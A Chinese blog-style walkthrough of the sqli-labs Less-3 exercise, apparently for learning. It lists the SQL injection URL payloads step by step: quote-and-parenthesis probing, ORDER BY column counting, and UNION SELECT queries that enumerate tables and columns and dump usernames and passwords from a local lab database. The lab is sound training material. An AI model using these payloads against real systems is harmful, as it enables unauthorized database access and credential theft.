当前位置: 首页 > news >正文

sqli-labs(Less-3)

在这里插入图片描述
1. 通过构造id=1’ 和id=1’) 和id=1’)–+确定存在注入
可知原始url为 id=(‘1’)
在这里插入图片描述
在这里插入图片描述在这里插入图片描述
2.使用order by 语句猜字段数

http://127.0.0.1/sqlilabs/Less-3/?id=1') order by 4 --+
http://127.0.0.1/sqlilabs/Less-3/?id=1') order by 3 --+

3. 使用联合查询union select

http://127.0.0.1/sqlilabs/Less-3/?id=-1') union select 1,2,3 --+
http://127.0.0.1/sqlilabs/Less-3/?id=-1') union select 1,database(),version() --+

4. 查询当前库的所有表

http://127.0.0.1/sqlilabs/Less-3/?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+

5.查询某表的所有列名

http://127.0.0.1/sqlilabs/Less-3/?id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users' --+

6. 获取账号密码

http://127.0.0.1/sqlilabs/Less-3/?id=-1') union select 1,group_concat(username),group_concat(password) from users --+```
http://127.0.0.1/sqlilabs/Less-3/?id=-1') union select 1,username,password from users limit 0,1 --+

相关文章:

  • Vue.js2+Cesium1.103.0 十四、绘制视锥,并可实时调整视锥姿态
  • ubuntu20源码编译搭建SRS流媒体服务器
  • 计算机视觉的应用17-利用CrowdCountNet模型解决人群数量计算问题(pytorch搭建模型)
  • SpringBoot-----从前端更新数据到MySql数据库
  • 什么是Selenium?如何使用Selenium进行自动化测试?
  • 97.qt qml-自定义Table之实现ctrl与shift多选
  • 报道 | 2023年12月-2024年2月国际运筹优化会议汇总
  • Uni-App常用事件
  • HarmonyOS开发Java与ArkTS如何抉择
  • 读像火箭科学家一样思考笔记02_与不确定性共舞(下)
  • windows nodejs 15.0.0下载安装
  • MatLab的下载、安装与使用(亲测有效)
  • linux时间调整
  • Vue全局添加水印
  • 【SQL server】 表结构的约束和维护
  • 03Go 类型总结
  • CentOS从零开始部署Nodejs项目
  • ES6之路之模块详解
  • express如何解决request entity too large问题
  • Java Agent 学习笔记
  • Linux链接文件
  • Logstash 参考指南(目录)
  • Python_网络编程
  • spring学习第二天
  • v-if和v-for连用出现的问题
  • Vue2.x学习三:事件处理生命周期钩子
  • vue-router的history模式发布配置
  • windows下如何用phpstorm同步测试服务器
  • 基于Volley网络库实现加载多种网络图片(包括GIF动态图片、圆形图片、普通图片)...
  • 简单实现一个textarea自适应高度
  • 排序算法学习笔记
  • 三栏布局总结
  • 限制Java线程池运行线程以及等待线程数量的策略
  • 延迟脚本的方式
  • # 安徽锐锋科技IDMS系统简介
  • ###项目技术发展史
  • #中国IT界的第一本漂流日记 传递IT正能量# 【分享得“IT漂友”勋章】
  • (33)STM32——485实验笔记
  • (C语言)输入一个序列,判断是否为奇偶交叉数
  • (java)关于Thread的挂起和恢复
  • (ZT)北大教授朱青生给学生的一封信:大学,更是一个科学的保证
  • (多级缓存)多级缓存
  • (翻译)Entity Framework技巧系列之七 - Tip 26 – 28
  • (每日持续更新)jdk api之StringBufferInputStream基础、应用、实战
  • (南京观海微电子)——I3C协议介绍
  • (译)2019年前端性能优化清单 — 下篇
  • (转)关于如何学好游戏3D引擎编程的一些经验
  • .NET 中创建支持集合初始化器的类型
  • .NET 自定义中间件 判断是否存在 AllowAnonymousAttribute 特性 来判断是否需要身份验证
  • .Net6 Api Swagger配置
  • .net6使用Sejil可视化日志
  • @Autowired标签与 @Resource标签 的区别
  • @Autowired和@Resource装配
  • @property括号内属性讲解
  • @serverendpoint注解_SpringBoot 使用WebSocket打造在线聊天室(基于注解)